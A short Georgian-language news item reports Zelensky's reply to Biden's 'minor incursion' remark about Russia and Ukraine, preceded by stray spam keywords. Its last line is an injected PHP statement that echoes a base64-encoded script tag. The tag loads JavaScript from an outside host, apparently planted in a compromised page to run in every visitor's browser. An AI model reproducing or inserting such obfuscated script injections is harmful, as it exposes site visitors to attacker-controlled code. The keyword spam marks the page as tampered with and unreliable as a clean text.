celsiusi
ავერსი საქკაბელი
უკრაინის პრეზიდენტი ვოლოდიმირ ზელენსკი გამოეხმაურა აშშ-ს პრეზიდენტის ჯო ბაიდენის მიერ უკრაინაში უკრაინაში რუსეთის "მცირე შეჭრა" და "შეჭრა" გამიჯნა.
 
"მინდა გავახსენო დიდ ძალებს, რომ არ არსებობს მცირე შეჭრა და პატარა ერები. ისევე როგორც არ არსებობს მცირე მსხვერპლი და მცირე მწუხარება საყვარელი ადამიანების დაკარგვის გამო. ამას ვამბობ როგორც დიდი ძალის, უკრაინის პრეზიდენტი." – წერს ზელენსკი.
 
19 იანვარს შემაჯამებელ პრესკონფერენციაზე ჯო ბაიდენმა ერთმანეთისგან გამიჯნა უკრაინაში რუსეთის "მცირე შეჭრა" და "შეჭრა". ბაიდენის ვარაუდით, პუტინი უკრაინაში შეიჭრება, თუმცა, მისი თქმით, "მცირე შეჭრაზე" პასუხი სრულმაშტაბიან შეჭრასთან შედარებით უფრო მსუბუქი იქნება.
 
"მცირე შეჭრა" ერთია, თუმცა თუ ისინი გააკეთებენ იმას, რისი გაკეთებაც შეუძლიათ, ეს რუსეთისთვის კატასტროფა იქნება". – თქვა ბაიდენმა.
 
აშშ-ს პრეზიდენტმა ისიც აღნიშნა, რომუკრაინაში შეჭრა პუტინს ძვირად დაუჯდება და მას ისეთ სანქციებს დაუწესებს, როგორიც აქამდე არასდროს უნახავს. ბადენის თანახმად, ახლო მომავალში უკრაინის NAთO-ში მიღების ალბათობა ძალიან მცირეა და მათ კიდევ ბევრი სამუშაო აქვთ როგორც დემოკრატიის გაძლიერების კუთხით, ასევე სხვა ბევრი მიმართულებითაც.
942
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");